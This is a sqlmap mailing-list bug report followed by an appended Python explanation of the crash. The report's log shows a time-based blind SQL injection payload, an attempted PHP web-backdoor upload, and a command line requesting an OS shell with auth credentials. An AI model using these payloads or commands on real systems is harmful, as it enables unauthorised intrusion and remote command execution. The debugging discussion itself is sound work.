I tried to upload the web backdoor with no knowledge of the web server document root. The result is a bug.
[18:52:39] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: n
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: n=-5351' OR 1181=SLEEP(5) AND 'DBAH'='DBAH&vurl=http://website.com/content/video16/001Ccmg.avi&cmd=altern
---
[18:52:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.6
back-end DBMS: MySQL 5
[18:52:39] [INFO] going to use a web backdoor for command prompt
[18:52:39] [INFO] fingerprinting the back-end DBMS operating system
[18:52:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[18:52:47] [INFO] the back-end DBMS operating system is Linux
[18:52:47] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[18:52:53] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[18:55:06] [INFO] retrieved web server full paths: '/members/video.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[18:55:15] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 1 times
[18:55:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4198), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 1.0-dev (r4198)
Python version: 2.7.1
Operating system: nt
Command line: C:\pentest\p\sqlmap.0.9-1\sqlmap.py -u http://website.com/members/video.php?n=769&vurl=************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************* --auth-type=basic --auth-cred=mstier07:mstier --random-agent --retries=6 --level 5 --risk 3 --os-shell
Technique: TIME
Back-end DBMS: MySQL (fingerprinted)

Traceback (most recent call last):
  File "C:\pentest\p\sqlmap.0.9-1\sqlmap.py", line 86, in main
    start()
  File "C:\pentest\p\sqlmap.0.9-1\lib\controller\controller.py", line 551, in start
    action()
  File "C:\pentest\p\sqlmap.0.9-1\lib\controller\action.py", line 139, in action
    conf.dbmsHandler.osShell()
  File "C:\pentest\p\sqlmap.0.9-1\plugins\generic\takeover.py", line 81, in osShell
    self.initEnv(web=web)
  File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\abstraction.py", line 151, in initEnv
    self.webInit()
  File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\web.py", line 240, in webInit
    uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 278, in getPage
    conn = urllib2.urlopen(req)
  File "C:\Python27\lib\urllib2.py", line 126, in urlopen
    return _opener.open(url, data, timeout)
  File "C:\Python27\lib\urllib2.py", line 392, in open
    response = self._open(req, data)
  File "C:\Python27\lib\urllib2.py", line 410, in _open
    '_open', req)
  File "C:\Python27\lib\urllib2.py", line 370, in _call_chain
    result = func(*args)
  File "C:\Python27\lib\urllib2.py", line 1186, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "C:\Python27\lib\urllib2.py", line 1127, in do_open
    h = http_class(host, timeout=req.timeout) # will parse host:port
  File "C:\Python27\lib\httplib.py", line 681, in __init__
    self._set_hostport(host, port)
  File "C:\Python27\lib\httplib.py", line 706, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '80\'

[*] shutting down at 18:55:15

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
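The traceback ends in httplib rejecting a host of `website.com:80\`: a backslash has ended up in the host:port part of the URL the tool built from the supplied document root and full path. The following Python 3 example is added here and is not sqlmap's code; it assumes (the report does not say) that a Windows-style path join put the backslash there. It re-implements the port check that raised the exception, so the failing input can be reproduced offline, and shows a URL builder that maps a filesystem path under a document root to its URL with POSIX joins only, rejecting paths outside the root and a malformed netloc before any connection is attempted. Names such as `url_for_path` and the sample hosts are constructed for this example.

```python
import posixpath
from urllib.parse import urlsplit, urlunsplit


def parse_host_port(netloc, default_port=80):
    """Split "host[:port]" the way httplib._set_hostport (http.client in
    Python 3) does: the text after the last ':' must be all digits, or the
    URL is rejected.  A path separator leaking into the netloc, e.g.
    "website.com:80\\", is the kind of input behind the traceback above."""
    i = netloc.rfind(':')
    j = netloc.rfind(']')  # IPv6 literals such as [::1]:8080 contain ':'
    if i > j:
        port_text = netloc[i + 1:]
        if not port_text.isdigit():
            raise ValueError("nonnumeric port: %r" % port_text)
        return netloc[:i], int(port_text)
    return netloc, default_port


def is_valid_netloc(netloc):
    """True if parse_host_port accepts the netloc."""
    try:
        parse_host_port(netloc)
        return True
    except ValueError:
        return False


def _posix(path):
    # Normalise either OS's separators to '/' and collapse '..' segments.
    return posixpath.normpath(path.replace('\\', '/'))


def is_under_root(doc_root, file_path):
    """True if file_path resolves to a location inside doc_root (after
    normalisation, so '/var/www/../etc/passwd' is not under '/var/www')."""
    root, path = _posix(doc_root), _posix(file_path)
    return path == root or path.startswith(root.rstrip('/') + '/')


def url_for_path(base_url, doc_root, file_path):
    """Map a filesystem path under doc_root to the URL it is served at.

    Joins are done with posixpath, so the result is identical whether the
    caller runs on Linux or Windows; os.path.join on Windows would insert
    a backslash and produce exactly the broken netloc seen in the report."""
    if not is_under_root(doc_root, file_path):
        raise ValueError("%r is not under document root %r" % (file_path, doc_root))
    root, path = _posix(doc_root), _posix(file_path)
    relative = path[len(root):].lstrip('/')
    parts = urlsplit(base_url)
    parse_host_port(parts.netloc)  # fail early on a malformed host:port
    url_path = posixpath.join('/', relative)
    return urlunsplit((parts.scheme, parts.netloc, url_path, '', ''))


if __name__ == "__main__":
    # Constructed inputs: the paths from the report and a Windows-style pair.
    print(url_for_path("http://website.com/", "/var/www/", "/var/www/members/video.php"))
    print(url_for_path("http://example.test:8080", r"C:\inetpub\wwwroot",
                       r"C:\inetpub\wwwroot\app\index.php"))
    print("netloc 'website.com:80\\\\' valid:", is_valid_netloc("website.com:80\\"))
```

Running the block on the paths from the report yields `http://website.com/members/video.php`; the same function gives `http://example.test:8080/app/index.php` for the Windows-style pair, while `is_valid_netloc("website.com:80\\")` is false, which is the condition a URL builder should check before handing the request to the HTTP layer.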